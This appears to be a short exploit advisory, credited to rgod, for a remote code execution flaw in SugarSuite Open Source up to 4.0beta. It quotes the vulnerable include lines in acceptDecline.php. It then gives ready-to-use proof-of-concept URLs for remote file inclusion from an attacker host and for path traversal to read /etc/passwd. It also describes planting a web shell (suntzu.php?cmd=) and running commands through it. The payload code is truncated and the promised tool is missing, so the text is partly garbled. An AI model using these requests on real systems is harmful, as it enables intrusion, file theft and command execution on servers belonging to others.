SugarSuite Open Source <= 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i) vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList[$_REQUEST['module']]; require_once($beanFiles[$bean]); ... if register_globals on & allow_url_fopen on in php.ini, remote code inclusion, poc: http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=http://[remote_location]/index.html&beanList[1]=1&module=1 if register_globals on, local inclusion, poc http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=../../../../../../../../etc/passwd&beanList[1]=1&module=1 http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=../../../../../../../../../script.php&beanList[1]=1&module=1 at [remote_location], in index.html you have this code: "); fclose($fp); ?> note: the file can have any extension, but not .php or any executable, it must be readable from a browser... now you can launch commands on target system: http://[target]/[path_to_sugar]/suntzu.php?cmd=cat%20/etc/passwd this is my proof of concept exploit tool:
Sugar Suite Open Source <= 4.0beta remote code execution
a script by rgod at http://rgod.altervista.org